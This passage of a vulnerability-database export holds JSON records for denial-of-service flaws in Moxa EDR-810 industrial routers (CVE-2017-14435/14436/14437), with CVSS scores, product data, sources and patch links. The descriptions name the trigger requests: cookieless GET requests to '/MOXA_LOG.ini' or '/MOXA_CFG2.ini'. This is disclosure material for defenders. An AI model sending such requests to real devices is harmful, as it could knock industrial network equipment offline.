"id": "JVNDB-2017-013415"
},
{
"db": "NVD",
"id": "CVE-2017-14435"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0474"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14435"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14435"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0474"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11732"
},
{
"db": "VULHUB",
"id": "VHN-105157"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013415"
},
{
"db": "NVD",
"id": "CVE-2017-14435"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-810"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11732"
},
{
"db": "VULHUB",
"id": "VHN-105157"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013415"
},
{
"db": "NVD",
"id": "CVE-2017-14435"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-810"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11732"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-105157"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013415"
},
{
"date": "2018-05-14T20:29:00.843000",
"db": "NVD",
"id": "CVE-2017-14435"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-810"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11732"
},
{
"date": "2022-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-105157"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013415"
},
{
"date": "2022-12-09T01:48:16.727000",
"db": "NVD",
"id": "CVE-2017-14435"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-810"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-810"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 In NULL Pointer dereference vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013415"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-810"
}
],
"trust": 0.6
}
}
VAR-201805-0142
Vulnerability from variot - Updated: 2023-12-18 13:08An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to "/MOXA_LOG.ini" without a cookie header to trigger this vulnerability. Moxa EDR-810 Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 Mosa ( Moxa ) company's one with both a firewall and VPN functional security router
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0142",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11730"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013416"
},
{
"db": "NVD",
"id": "CVE-2017-14437"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-808"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14437"
}
]
},
"cve": "CVE-2017-14437",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14437",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-11730",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-105159",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14437",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14437",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-14437",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-11730",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-808",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105159",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11730"
},
{
"db": "VULHUB",
"id": "VHN-105159"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013416"
},
{
"db": "NVD",
"id": "CVE-2017-14437"
},
{
"db": "NVD",
"id": "CVE-2017-14437"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-808"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to \"/MOXA\\_LOG.ini\" without a cookie header to trigger this vulnerability. Moxa EDR-810 Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 Mosa ( Moxa ) company\u0027s one with both a firewall and VPN functional security router",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14437"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013416"
},
{
"db": "CNVD",
"id": "CNVD-2018-11730"
},
{
"db": "VULHUB",
"id": "VHN-105159"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "TALOS",
"id": "TALOS-2017-0474",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2017-14437",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013416",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-808",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11730",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105159",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11730"
},
{
"db": "VULHUB",
"id": "VHN-105159"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013416"
},
{
"db": "NVD",
"id": "CVE-2017-14437"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-808"
}
]
},
"id": "VAR-201805-0142",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11730"
},
{
"db": "VULHUB",
"id": "VHN-105159"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11730"
}
]
},
"last_update_date": "2023-12-18T13:08:30.375000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "Patch for MoxaEDR-810 Denial of Service Vulnerability (CNVD-2018-11730)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132247"
},
{
"title": "Moxa EDR-810 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190039"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11730"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013416"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-808"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-476",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105159"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013416"
},
{
"db": "NVD",
"id": "CVE-2017-14437"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0474"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14437"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14437"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0474"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11730"
},
{
"db": "VULHUB",
"id": "VHN-105159"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013416"
},
{
"db": "NVD",
"id": "CVE-2017-14437"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-808"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11730"
},
{
"db": "VULHUB",
"id": "VHN-105159"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013416"
},
{
"db": "NVD",
"id": "CVE-2017-14437"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-808"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11730"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-105159"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013416"
},
{
"date": "2018-05-14T20:29:00.937000",
"db": "NVD",
"id": "CVE-2017-14437"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-808"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11730"
},
{
"date": "2022-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-105159"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013416"
},
{
"date": "2022-12-09T02:00:15.830000",
"db": "NVD",
"id": "CVE-2017-14437"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-808"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-808"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 In NULL Pointer dereference vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013416"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-808"
}
],
"trust": 0.6
}
}
VAR-201805-0141
Vulnerability from variot - Updated: 2023-12-18 13:08An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to "/MOXA_CFG2.ini" without a cookie header to trigger this vulnerability. Moxa EDR-810 Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0141",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11731"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013421"
},
{
"db": "NVD",
"id": "CVE-2017-14436"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-809"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14436"
}
]
},
"cve": "CVE-2017-14436",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14436",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-11731",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-105158",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14436",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14436",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-14436",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-11731",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-809",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105158",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11731"
},
{
"db": "VULHUB",
"id": "VHN-105158"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013421"
},
{
"db": "NVD",
"id": "CVE-2017-14436"
},
{
"db": "NVD",
"id": "CVE-2017-14436"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-809"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
